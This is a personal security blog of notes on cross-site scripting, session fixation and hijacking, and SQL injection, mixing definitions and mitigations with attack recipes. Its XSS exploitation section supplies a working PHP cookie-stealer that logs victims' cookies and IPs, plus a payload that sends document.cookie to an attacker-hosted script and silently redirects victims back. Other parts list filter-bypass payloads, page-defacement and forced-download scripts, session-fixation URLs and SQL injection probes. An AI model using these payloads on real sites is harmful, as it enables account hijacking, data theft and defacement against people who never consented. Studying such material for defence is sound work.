Cross Site Scripting (XSS)

Monday, 18 June 2018

Cross Site Scripting (XSS)
===============================
Definition => Cross-site Scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.

The ability to inject code into the Web page generated, potential threats. An attacker can use XSS vulnerabilities to steal cookies, hijack accounts, execute ActiveX, execute Flash content, force you to download software, and take action on your hard disk and data.

If you look more closely at the URL, it might actually exploit a vulnerability in your bank’s Web site, and look something like http://www.website.com/somepage?redirect=<script>alert(‘XSS’)</script>, where the use of the “redirect” parameter has been exploited to carry out the attack.

**************************
ALL about SQL Injection and Defence
What is Session
Fun with computers => make-folder-without-name
********************************************************

XSS are 3 types
==================
Stored XSS (AKA Persistent or Type I)
Stored XSS generally occurs when user input is stored on the target server, such as in a database, in a message forum, visitor log, comment field, etc. And then a victim is able to retrieve the stored data from the web application without that data being made safe to render in the browser

Reflected XSS (AKA Non-Persistent or Type II)
Reflected XSS occurs when user input is immediately returned by a web application in an error message, search result, or any other response that includes some or all of the input provided by the user as part of the request, without that data being made safe to render in the browser, and without permanently storing the user provided data. In some cases, the user-provided data may never even leave the browser

DOM Based XSS (AKA Type-0)
DOM Based XSS is a form of XSS where the entire tainted data flow from source to sink takes place in the browser, i.e., the source of the data is in the DOM, the sink is also in the DOM, and the data flow never leaves the browser. For example, the source (where malicious data is read) could be the URL of the page (e.g., document.location.href), or it could be an element of the HTML, and the sink is a sensitive method call that causes the execution of the malicious data (e.g., document.write)."

URL fragments (use to go something inside javascript | Something coming after # (hash) will not go to the server.


Attacks can be done by XSS
==========================================
> steal cookies (if they are not httpOnly)
> retrieve the current page that the victim sees (as the victim user)
> get the current URL of the victim
> get the current referrer of the victim
> Redirect to some other website
> use the application cookies to gain access to the victim’s account
> use possible CSRF (cross-site request forgery) vulnerabilities to make the victim perform unwanted actions in the application (e.g. add a new user)
> inject malicious code into victim’s browser in order to exploit browser vulnerabilities
> inject malicious Java applet, etc

Mitigation
===============
> Input validation  both client and server side
> Output encoding
> White listing of words
> OWASP escapi

JavaScript functionality
==============================
Window object
Windows Object Properties
1) window.locate
<script>window.location.href="htts://www.google.co.in"</script>

2) document.body.innerHTML
<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script>


XSS Cases
===================
Case 1 :
When there is no input validation and no output encoding use simple payload
<script>alert(9)</script>
<svg/onload=alert(9)>
“><img src=x onerror=alert(1);>

Case 2 :
When value is going inside value Case (value= "something">) then try to put payload outside the double quotes
"><script>alert(9)</script>
"><svg/onload=alert(9)>

Case 3 :
Try inject payload all the possible parameters, input boxes, dropdown list and hidden fields like
input boxes
search?q=
value=' '
drop down list value going in a parameter
p=something (Hidden) (intercept with the burp-Suite)

Case 4 :
when input box has limitation of alphabets to be written in it. Then right click on input box choose inspect element and change the number to max (so that u can write your payload)
value = "><svg/onload=alert(9)>

Case 5 :
When you are getting output encoding inside the value tag then try to make payload using event handlers like onmouseover or onmouseclick
Even see what all things are output encoded and escaped
123" onmouseover="alert(9);
asd" onmouseclick="alert(9);
When server is escaping special characters like " or ' then payload be
123 onmouseover=alert(9);

Case 6 : 
A thumb rule for href tag is that when any input is making a hyperlink just give him a simple payload
javascript:alert(9)
and you get the alert box
hyper link payloads
<a href="http:google.com" onclick=javascript:alert(9)> for always a link created
www.google.com" onclick="confirm(9)"> href payload

Case 7 : 
When server is removing some words or alphabets the try to covert that words in base64 to bypass
"><script>eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='));</script>
"><script>eval(alert(document.domain))</script>

Case 8 :
the words script, style and on aren't allowed, we have to think about something else this time. Apparently, it's possible to encode JavaScript as Base64 and make it execute as an iframe src.

<iframe src="data:text/html;base64, .... base64 encoded HTML data ....">

The HTML data we want to use is:
<script>parent.alert(document.domain);</script>

parent. is needed because we want the alert to execute in the context of the parent's window. Encoding it as Base64 with the Character Encoding Calculator results in:

PHNjcmlwdD5wYXJlbnQuYWxlcnQoZG9jdW1lbnQuZG9tYWluKTs8L3NjcmlwdD4

The code that we will then put into the search box to finish the level is:

"><iframe src="data:text/html;base64,PHNjcmlwdD5wYXJlbnQuYWxlcnQoZG9jdW1lbnQuZG9tYWluKTs8L3NjcmlwdD4="></iframe>


Case 9 : 
Sometimes playing with html tags also leads to XSS
for example :
closing of a textarea and then putting a payload leads to stored XSS
payload :
</textarea><svg/onload=alert(9)>

Case 10 :
Sometimes putting a parameter and then a payload leads to reflective XSS
for example
we have an url http://www.website.com/forgotpassword
change to
url http://www.website.com/forgotpassword?aa=<script>alert(9)</script>

Case 11 :
When some input is going inside <script> </script> the we have to only put "-alert(9)-"
it is vulnerable to XSS

Case 12 : DOM BASED XSS
For example:
1)
Assume that the URL
http://www.vulnerable.site/welcome.html

contains the following content:
<HTML>
<TITLE>Welcome!</TITLE>
Hi
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT>

Welcome to our system
…</HTML>
This page will use the value from the "name" parameter in the following manner.
http://www.vulnerable.site/welcome.html?name=Joe
In this example, the JavaScript code embeds part of the document.URL (the page location) into the page, without any consideration for security. An attacker can abuse this by luring the client to click on a link such as
http://www.vulnerable.site/welcome.html?name=
<script>alert(document.cookie)</script>

2)
<script>

var h = document.location.hash.substring(1);
if (h && h != ""){
 var re = new RegExp(".+@.+");
 if (h.match(re)){
document.getElementById("email").innerHTML+="("+h+")";
}
}
</script>
payload = <img/src=x onerror=alert(9)>@gmail.com
==============
IMP :-
Attribute's value field (with the " character escaped to &#34). Escaping ASCII characters can easily be done through this character encoding calculator: http://ha.ckers.org/xsscalc.html.
============================================================================================================================


**************************
ALL about SQL Injection and Defence
What is Session
Fun with computers => make-folder-without-name
**************************************************

Exploitation With XSS
=========================
IMP => https://www.exploit-db.com/papers/13057/
   https://www.exploit-db.com/docs/15530.pdf
http://internet.wonderhowto.com/how-to/hack-remote-internet-browser-with-xss-shell-261948/

Exploit 1 :
Attacker can redirect victim to the malicious website
payload :
<script>alert("click ok to redirect");window.location.href="https://www.google.com"</script>

Attacker can make victim to download any malicious file to download
payload
<script>document.location="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe";</script>

Exploit 2 :
Attacker can steal cookies of the victim
How to do it :
In stealing cookies, there is a 3 step process
attacker needs
1)injected script
2)cookies stealer
3)log file

Create an account on a server and create two files, log.txt and cookiestealer.php. You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste following php code into your cookie stealer script (cookiestealer.php):

cookiestealer code :

<?php

function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}

function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
fclose($log);
}

logData();

?>

This script will record the cookies of every user that views it.

Now find a XSS vulnerable page or parameter or search box and put the payload
"><script language= "JavaScript">document.location="http://yoursite.com/cookiestealer.php?cookie=" + document.cookie;document.location="http://www.whateversite.com"</script>

yoursite.com is the server you're hosting your cookie stealer and log file on, and whateversite.com is the vulnerable page you're exploiting. The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don't know anything happened.

Exploit 3 : 
Attacker can deface a page with its own page or pic or photo
Palyload
<img src=link of the image>
<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script>

Exploit 4 :
BEF = Browser Exploitation Framework

http://www.hacking-tutorial.com/hacking-tutorial/xss-attack-hacking-using-beef-xss-framework/#sthash.kypFITWL.dpbs



Session_ALL about Session

Session ID is not updating after login
This attack is done locally: for example => in an organization someone log out and the session is not expired, he/she may try login into it by using that session again

Attack Scenario: Setting Session ID help of XSS

*************************
All about broken-authentication-and-session
SQL Injection and Defense
*************************************************

Session Fixation
======================
Session Fixation is an attack that permits an attacker to hijack a valid user session. The attack explores a limitation in the way the web application manages the session ID, more specifically the vulnerable web application. When authenticating a user, it doesn’t assign a new session ID, making it possible to use an existent session ID. The attack consists of obtaining a valid session ID (e.g. by connecting to the application), inducing a user to authenticate himself with that session ID, and then hijacking the user-validated session by the knowledge of the user session ID. The attacker has to provide a legitimate Web application session ID and try to make the victim's browser use it.

The session fixation attack is a class of Session Hijacking, which steals the established session between the client and the Web Server after the user logs in. Instead, the Session Fixation attack fixes an established session on the victim's browser, so the attack starts before the user logs in.

There are several techniques to execute the attack; it depends on how the Web application deals with session tokens. Below are some of the most common techniques:

• Session token in the URL argument: The Session ID is sent to the victim in a hyperlink and the victim accesses the site through the malicious URL.

• Session token in a hidden form field: In this method, the victim must be tricked to authenticate in the target Web Server, using a login form developed for the attacker. The form could be hosted in the evil web server or directly in HTML formatted e-mail.

• Session ID in a cookie:

o Client-side script

Most browsers support the execution of client-side scripting. In this case, the aggressor could use attacks of code injection as the XSS (Cross-site scripting) attack to insert a malicious code in the hyperlink sent to the victim and fix a Session ID in its cookie. Using the function document.cookie, the browser which executes the command becomes capable of fixing values inside of the cookie that it will use to keep a session between the client and the Web Application.

o <META> tag

<META> tag also is considered a code injection attack, however, different from the XSS attack where undesirable scripts can be disabled, or the execution can be denied. The attack using this method becomes much more efficient because it's impossible to disable the processing of these tags in the browsers.

o HTTP header response

This method explores the server response to fix the Session ID in the victim's browser. Including the parameter Set-Cookie in the HTTP header response, the attacker is able to insert the value of Session ID in the cookie and sends it to the victim's browser.

*************************
Cross Site Scripting => Click on me :)
All about broken-authentication-and-session
SQL Injection and Defense
*************************************************


Session hijacking
======================
The Session Hijacking attack consists of the exploitation of the web session control mechanism, which is normally managed for a session token.

Because HTTP communication uses many different TCP connections, the web server needs a method to recognize every user’s connections. The most useful method depends on a token that the Web Server sends to the client browser after a successful client authentication. A session token is normally composed of a string of variable width and it could be used in different ways, like in the URL, in the header of the HTTP requisition as a cookie, in other parts of the header of the HTTP request, or yet in the body of the HTTP requisition.

The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.

The session token could be compromised in different ways; the most common are:

Predictable session token;
Session Sniffing;
Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc);
Man-in-the-middle attack
Man-in-the-browser attack

Broken Authentication and Session Management

Broken Authentication and Session Management
===============================================
Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords,keys,or session tokens, or to exploit other implementation flaws to assume other user's identities.

Developers frequently build custom authentication and session management schemes, but building these correctly is hard. As a result, these custom schemes frequently have flaws in areas such as logout, password management, time-outs, remember me, secret question, account update, etc. Finding such flaws can sometimes be difficult, as each implementation is unique

Session IDs
=================
A Session is a unique identifier....
As we know that HTTP is a stateless protocol, which means that it provides no integrated way for a web server to maintain states throughout user’s subsequent requests.
A session identifier, session ID or session token is a piece of data that is used in network communications (often over HTTP) to identify a session, a series of related message exchanges. Session identifiers become necessary in cases where the communications infrastructure uses a stateless protocol such as HTTP.
For example, a buyer who visits a seller's site wants to collect a number of articles in a virtual shopping cart and then finalize the shopping by going to the site's checkout page. This typically involves an ongoing communication where several web pages are requested by the client and sent back to them by the server. In such a situation, it is vital to keep track of the current state of the shopper's cart, and a session ID is one way to achieve that goal.

A session ID is typically granted to a visitor on his first visit to a site. It is different from a user ID in that sessions are typically short-lived (they expire after a preset time of inactivity which may be minutes or hours) and may become invalid after a certain goal has been met (for example, once the buyer has finalized his order, he cannot use the same session ID to add more items).

Three widely used methods for maintaining sessions in WEB
=======================================================
1) URL arguments
2) Hidden form fields
3) Cookies (cookies have proven to be the most convenient)

************************************
Cross Site Scripting => Click on me :)
Basics for SQL Injection and Remediations => Click on me :)
Nmap with Metasploits => Click one me :)
*************************************************************


Session Management
=====================
Session management is the process of keeping track of a user's activity across sessions of interaction with the computer system.
Types
======
Desktop session management => A desktop session manager is a program that can save and restore desktop sessions. A desktop session is all the windows currently running and their current content.

Browser session management => Session management is particularly useful in a web browser where a user can save all open pages and settings and restore them at a later date. To help recover from a system or application crash, pages and settings can also be restored on next run.

Web Server Session management => Hypertext Transfer Protocol (HTTP) is stateless: a client computer running a web browser must establish a new Transmission Control Protocol (TCP) network connection to the web server with each new HTTP GET or POST request. The web server, therefore, cannot rely on an established TCP network connection for longer than a single HTTP GET or POST operation. Session management is the technique used by the web developer to make the stateless HTTP protocol support session state. For example, once a user has been authenticated to the web server, the user's next HTTP request (GET or POST) should not cause the web server to ask for the user's account and password again. For a discussion of the methods used to accomplish this see HTTP cookie and Session ID

Session management over SMS =>

Vulnerabilities
===========================
> User authentication credentials aren’t protected when stored using hashing or encryption.
> Credentials can be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs).
> Session IDs are exposed in the URL (e.g., URL rewriting).
> Session IDs are vulnerable to session fixation attacks.
> Session IDs don’t time-out, or user sessions or authentication tokens, particularly single sign-on (SSO) tokens, aren’t properly invalidated during logout.
> Session IDs aren’t rotated after successful login.
> Passwords, session IDs, and other credentials are sent over unencrypted connections.


Attacks Done on Session IDs
=====================================
1) Session Hijacking => The attacker gains access to the user’s session by obtaining his session ID, is called session hijacking
2) Session fixation =>  The attacker fixes the user’s session ID before the user even logs into the target server, thereby eliminating the need to obtain the user’s session ID afterwards.
Attacks made in session fixation =>
*) Interception (Encrypted communication effectively protects against interception)
*) Prediction (Cryptographically strong pseudo random number generators and carefully chosen seeds that don’t leak from the serve prevents prediction of session IDs)
*) Brute-force (Bit-length is large enough with respect to the number of simultaneous sessions)

Session fixation vs. session hijacking
==========================================
Timing
Session fixation : Attacker attacks the user’s browser before he logs in to the target server.
Session hijacking : Attacker attacks the user’s browser after he logs in to the target server.

Impact Duration
Session fixation : Attacker gains one-time, temporary or long-term access to the user’s session(s).
Session hijacking : Attacker usually gains one-time access to the user’s session and has to repeat the attack in order to gain access to another one.

Session Maintenance
Session fixation : Can require the attacker to maintain the trap session until the user logs into it.
Session hijacking : Requires no session maintenance.

Attack Vectors
Session fixation
1. Tricking the user to log in through a malicious hyperlink or a malicious login form
2. Exploiting a cross-site scripting vulnerability on any web server in the target server’s domain
3. Exploiting a meta tag injection vulnerability on any web server in the target server’s domain
4. Exploiting the “session adoption” feature of some web servers
5. Breaking into any host in the target server’s domain
6. Adding a domain cookie-issuing server to the target server’s domain in the user’s DNS server
7. Network traffic modification

Session hijacking
1. Exploiting a cross-site scripting vulnerability on the target server
2. Obtaining the session ID in the HTTP Referer header sent to another web server
3. Network traffic sniffing (only works with an unencrypted link to the target server)

Attack Target Area
Session fixation : Communication link, target web server, all hosts in target server’s domain, user’s DNS server
Session hijacking : Communication link, target web server


Mitigation
===============
1) HTTPonly
2) Secure flag if HTTPS is there
3) Encrypted communication between the user’s browser and the target web server
4) Ensuring that sessions expire and within a reasonable period of time

Broken Authentication and Session Management Cases
=====================================================
Case 1:
Plain text storage of password
Storing a password in plaintext may result in a system compromise
Attacker can sniff the network with the help of any sniffing tool (such as wire-shark)

Case 2:
Improper Authentication
The user claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct.

Case 3:
Missing Encryption of Sensitive Data
The software/website does not encrypt sensitive or critical information before storage or transmission
The lack of proper data encryption passes up the guarantees of confidentiality, integrity, and accountability that properly implemented encryption conveys.
For example : Storage for credit card no. or pin, user info or password

Case 4:
Clear text Transmission of Sensitive Information
The software transmits sensitive or security-critical data in cleartext in a communication channel that can be sniffed by an attacker.
Many communication channels can be "sniffed" by attackers during data transmission. For example, network traffic can often be sniffed by an attacker who has access to a network interface. This significantly lowers the difficulty of exploitation by attackers.

Case 5:
Session Fixation
Read above for session fixation

Case 6:
Insufficiently Protected Credentials
Login pages not using adequate measures to protect the username and password while they are in transit from the client to the server
Use SSL

Case 7:
Insufficient Session Expiration
"Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization."
The lack of proper session expiration may improve the likely success of certain attacks. For example, an attacker may intercept a session ID, possibly via a network sniffer or Cross-site Scripting attack. Although short session expiration times do not help if a stolen token is immediately used, they will protect against ongoing replaying of the session ID. In another scenario, a user might access a website from a shared computer (such as at a library, Internet cafe, or open work environment). Insufficient Session Expiration could allow an attacker to use the browser's back button to access web pages previously accessed by the victim.
> Set sessions/credentials expiration date

Case 8:
Unverified Password Change
When setting a new password for a user, the product does not require knowledge of the original password or using another form of authentication.
This could be used by an attacker to change passwords for another user, thus gaining the privileges associated with that user. (may lead to CSRF)

Case 9:
Weak Password Recovery Mechanism for Forgotten Password
The software contains a mechanism for users to recover or change their passwords without knowing the original password, but the mechanism is weak.
It is common for an application to have a mechanism that provides a means for a user to gain access to their account in the event they forget their password. Very often the password recovery mechanism is weak, which has the effect of making it more likely that it would be possible for a person other than the legitimate system user to gain access to that user's account.(May lead to Brute force attack)
This weakness may be that the security question is too easy to guess or find an answer to (e.g. because it is too common). Or there might be an implementation weakness in the password recovery mechanism code that may for instance trick the system into e-mailing the new password to an e-mail account other than that of the user. There might be no throttling done on the rate of password resets so that a legitimate user can be denied service by an attacker if an attacker tries to recover their password in a rapid succession. The system may send the original password to the user rather than generating a new temporary password. In summary, password recovery functionality, if not carefully designed and implemented can often become the system's weakest link that can be misused in a way that would allow an attacker to gain unauthorized access to the system. Weak password recovery schemes completely undermine a strong password


Exploitation With SessionId
================================
IMP : https://www.exploit-db.com/papers/15990/
=============

Exploit 1 : Session Fixation
A bank website, Session IDs are transported from browser to server within a URL argument sessionid.

The attacker – who in this case is also a legitimate user of the system – logs into the server and is issued a session ID 1234. The attacker then sends a hyperlink
http://online.worldbank.dom/login.jsp?sessionid=1234 to the victim, trying to lure him into clicking on it. The victim clicks on the link, which opens the server’s login page in his browser.
Note that upon request for login.jsp?sessionid=1234, the web application has established that a session already exists for this user and a new one need not be created. Finally, the user provides his credentials to the login script and the server grants him access to his bank account. However, at this point, knowing the session ID, the attacker can also access the victim's account via account.jsp?sessionid=1234. Since the session has already been fixed before the user logged in, we say that the user logged into the attacker’s session.

Attackers Uses http://online.worldbank.dom/<script>document.cookie="sessionid=1234”;</script>.idc to fix the session id in to victim browser

For Domain Cookies fixation
Attacker uses http://online.worldbank.dom/<script>document.cookie="sessionid=1234;domain=.worldbank.dom”;</script>.idc

Meta tag injection
====================
Issuing a cookie using the <META> tag with Set-Cookie attribute
<meta http-equiv=Set-Cookie content="sessionid=1234">

http://online.worldbank.dom/<meta%20http-equiv=Set-Cookie%20content="sessionid=1234;%20Expires=Friday,%201-Jan-2010%2000:00:00%20GMT”>.idc

Exploit 2 : Network Base attack (man in the middle attack)
Sniffing the packets with in the network coming to and from the victim computer

The attacker can inject a small (invisible) image in any web server’s response to the browser – for example when the user is reading Yahoo news. This image would originate from any web server in the .website.com domain. Upon requesting the image content, the browser would connect to this web server and the attacker, intercepting the request, could send a fake response by the web server, including a Set-Cookie header, thereby fixing the user’s session.

Exploit 3 : Prediction
The attacker can predict the session if session ids are not unique or random numbers are no coming
For example :
The session id is 123456
session id2 is 123456789
session id3 is predictable may be 123456789101112

SQL injection Contd......

Tuesday, 5 June 2018


Sql injection is must be tested in headers cookies and parameters with a single quote (') Sql injection is more important then XSS and are always find in Select, create, update and delete where sql queries run... We search for error base entries which are dealing with database must be fuzzed with sql injection and with burp scanner CRUD must not be missed out detection is more important to find new areas of detection jason request, where there is key parameter must not be ignored as they are attached to the database for exploitation.

************************
Read the => SQL injection attack and defense notes
*****************************************

SQL map 
if not exploitable then reduce to likelihood but not the impact is always

Remediation 
suggest generic remediation and tenchologies based .net php j2ee

OWSASP guide is best to google search on this
 dynamic query 
Dynamic SQL is a programming technique that enables you to build SQL statements dynamically at runtime. You can create more general purpose, flexible applications by using dynamic SQL because the full text of a SQL statement may be unknown at compilation. For example, dynamic SQL lets you create a procedure that operates on a table whose name is not known until runtime.

Stored procedure functions persistent query 
 prepared statement 
 parameterized query (pre-compiled statement ) imp
 A parameterized query (also known as a prepared statement) is a means of pre-compiling a SQL statement so that all you need to supply are the "parameters" (think "variables") that need to be inserted into the statement for it to be executed. It's commonly used as a means of preventing SQL injection attacks php .net jsp is different.



************************
Read the => SQL injection attack and defense notes
*****************************************

SQL injection attack and defense notes



SQL injection vulnerabilities most commonly occur when the Web application developer does not ensure that values received from a Web form, cookie, input parameter, and so forth are validated or encoded before passing them to SQL queries that will be executed on a database server.

If an attacker can control the input that is sent to an SQL query and manipulate that input so that the data is interpreted as code instead of as data, he may be able to execute code on the back-end database.

Without a sound understanding of the underlying database that they are interacting with or a thorough understanding and awareness of the potential security issues
of the code that is being developed, application developers can often produce inherently insecure applications that are vulnerable to SQL injection

What is the impact of an SQL injection vulnerability?
A: This depends on many variables; however, potentially an attacker can manipulate data in the database, extract much more data than the application should allow, and possibly execute operating system commands on the database server

Is SQL injection a new vulnerability?
A: No. SQL injection has probably existed since SQL databases were first connected to Web applications. However, it was brought to the attention of the public on Christmas Day 1998.

Can Web sites be immune to SQL injection if they do not allow the quote character to be entered?
A: No. There is a myriad of ways to encode the quote character so that it is accepted as input, and some SQL injection vulnerabilities can be exploited without using it at all. Also, the quote character is not the only character that can be used to exploit SQL injection vulnerabilities; a number of characters are available to an attacker, such as the double pipe (||) and double quote (“), among others.

Q: My application is written in PHP/ASP/Perl/.NET/Java, etc. Is my chosen language immune?
A: No. Any programming language that does not validate input before passing it to a dynamically created SQL statement is potentially vulnerable; that is, unless it uses parameterized queries and bind variables.

**********************
Learn more on => SQL injection Contd......
Cross Site Scripting => Click on me :)
************************************************

Finding SQL Injection
=========================
The Web browser is a client acting as a front-end requesting data from the user and sending it to the remote server which will create SQL queries using the submitted data. Our main goal at this stage is to identify anomalies in the server response and determine whether they are generated by an SQL injection vulnerability.


Testing by Inference
There is one simple rule for identifying SQL injection vulnerabilities: Trigger anomalies by
sending unexpected data. This rule implies that:
■■ You identify all the data entry on the Web application.
■■ You know what kind of request might trigger anomalies.
■■ You detect anomalies in the response from the server.

The two most method are GET and POST
Now Get send everything in URL
for exampe :- GET /search.aspx?text=lcd%20monitors&cat=1&num=20 HTTP/1.1
ex-2
This kind of request sends parameters within the URLs in the following format:
?parameter1=value1&parameter2=value2&parameter3=value3...

POST = POST method is basically used when u fill the form, the value are sent at the bottom of the request

POST /contact/index.asp HTTP/1.1

Content-Length: 129
first=John&last=Doe&email=john@doe.com&phone=555123456&title=Mr&country=US&comments=
I%20would%20like%20to%20request%20information

Manipulating Parameter
For example, u have an URL
http://www.victim.com/showproducts.php?category=bikes
http://www.victim.com/showproducts.php?category=cars
http://www.victim.com/showproducts.php?category=boats

The showproducts.php page receives a parameter called category. we don't have type anything but click on link and u r redirected

but if u change http://www.victim.com/showproducts.php?category=attacker

you get SQL error
In the preceding example, we sent a request to the server with a non-existent category
name. The response from the server was as follows:
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/victim.com/showproducts.php on line 34

**********************
Learn more on => SQL injection Contd......
************************************************

Another interesting test you can conduct to identify vulnerabilities in Microsoft SQL Server and Oracle is to send the following two requests to the Web server:
http://www.victim.com/showproducts.php?category=bikes
http://www.victim.com/showproducts.php?category=bi'+'kes
The MySQL equivalent is:
http://www.victim.com/showproducts.php?category=bikes
http://www.victim.com/showproducts.php?category=bi' 'kes

If the result of both requests is the same, there is a high possibility that there is an SQL injection vulnerability.

SQL injection vulnerabilities occur for two reasons:
■■ Lack of user input sanitization
■■ Data and control structures mixed in the same transport channel

handled as a result of one of the following:
The SQL error ■■ is displayed on the page and is visible to the user from the
Web browser.
■■ The SQL error is hidden in the source of the Web page for debugging purposes.
■■ Redirection to another page is used when an error is detected.
■■ An HTTP error code 500 (Internal Server Error) or HTTP redirection code 302
is returned.
■■ The application handles the error properly and simply shows no results, perhaps
displaying a generic error page.


Commonly Displayed SQL Errors
===============================

Microsoft SQL Server Errors

Consider the following request:
http://www.victim.com/showproducts.aspx?category=attacker'
The error returned from the remote application will be similar to the following:
Server Error in '/' Application.
Unclosed quotation mark before the character string 'attacker;'.

Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation

Imagine you find a page called showproduct.aspx in the victim.com application.
The script receives a parameter called id and displays a single product depending on the value
of the id parameter:
http://www.victim.com/showproduct.aspx?id=2
When you change the value of the id parameter to something such as the following:
http://www.victim.com/showproduct.aspx?id=attacker
the application returns an error similar to this:
Server Error in '/' Application.
Invalid column name 'attacker'.
Description: An unhandled exception occurred during the execution of the
current web request. Please review the stack trace for more information
about the error and where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Invalid column name
'attacker'.
mark before the character string 'attacker;'.


Based on the error, you can assume that in the first instance the application creates an
SQL statement such as this:
SELECT * FROM products WHERE idproduct=2
The preceding statement returns a result set with the product whose id product field equals 2. However, when you inject a non-numeric value, such as attacker, the resultant SQL statement sent to the database server has the following syntax:
Testing for SQL Injection
SELECT * FROM products WHERE idproduct=attacker
The SQL server understands that if the value is not a number it must be a column name.
In this case, the server looks for a column called attacker within the products table. However,
there is no column named attacker, and therefore it returns an error.
There are some techniques that you can use to retrieve information embedded in the
errors returned from the database. The first one generates an error converting a string to an
integer:
http://www.victim.com/showproducts.aspx?category=bikes' and 1=0/@@version;--
Application response:
Server Error in '/' Application.
Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 – 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft
Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: ) ' to a column of data type int.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information
about the error and where it originated in the code.
The database reported an error, converting the result of @@version to an integer and displaying its contents. This technique abuses the type conversion functionality in SQL Server. We sent 0/@@version as part of our injected code. As a division operation needs to be executed between two numbers, the database tries to convert the result from the @@version function into a number. When the operation fails the database displays the content of the variable.
You can use this technique to display any variable in the database. The following |
example
uses this technique to display the user variable:



MySQL Errors
A common configuration is formed by an Apache Web server running PHP on a Linux operating system, but you can find it in many other scenarios as well. The following error is usually an indication of a MySQL injection vulnerability:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/victim.com/showproduct.php on line 8

In this example, the attacker injected a single quote in a GET parameter and the PHP page sent the SQL statement to the database. The following fragment of PHP code shows the vulnerability:
<?php
//Connect to the database
mysql_connect("[database]", "[user]", "[password]") or
//Error checking in case the database is not accessible
die("Could not connect: " . mysql_error());
//Select the database
mysql_select_db("[database_name]");


When an application running the preceding code catches database errors and the SQL query fails, the returned HTML document will include the error returned by the database. If an attacker modifies a string parameter by adding a single quote the server will return
output similar to the following:
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

The preceding output provides information regarding why the SQL query failed. If the
injectable parameter is not a string and therefore is not enclosed between single quotes, the
resultant output would be similar to this:
Error: Unknown column 'attacker' in 'where clause'


**********************
Learn more on => SQL injection Contd......
************************************************

Oracle Errors

When tampering with the parameters of Java applications with an Oracle back-end
database you will often find the following error:
java.sql.SQLException: ORA-00933: SQL command not properly ended at
oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:180) at
oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
The preceding error is very generic and means that you tried to execute a syntactically
incorrect SQL statement. Depending on the code running on the server you can find the
following error when injecting a single quote:
Error: SQLException java.sql.SQLException: ORA-01756: quoted string not
properly terminated
In this error the Oracle database detects that a quoted string in the SQL statement is not
properly terminated, as Oracle requires that a string be terminated with a single quote. The
following error re-creates the same scenario in .NET environments:
Exception Details: System.Data.OleDb.OleDbException: One or more errors
occurred during processing of command.
ORA-00933: SQL command not properly ended
The following example shows an error returned from a .NET application


sql injection payload => bikes’ or ‘1’=’1?  to make always true


In this example, we injected SQL code that created a meaningful correct query. If the
application is vulnerable to SQL injection, the preceding query should return every row in
the products table. This technique is very useful, as it introduces an always true condition.
‘ or ‘1’=’1 is inserted inline with the current SQL statement and does not affect the
other parts of the request. The complexity of the query doesn’t particularly matter, as we can
easily create a correct statement.

Another test to perform in this kind of situation is the injection of an always false
statement.
For that we will send a value that generates no results; for example, bikes’
AND ‘1’=’2:
SELECT *
FROM products
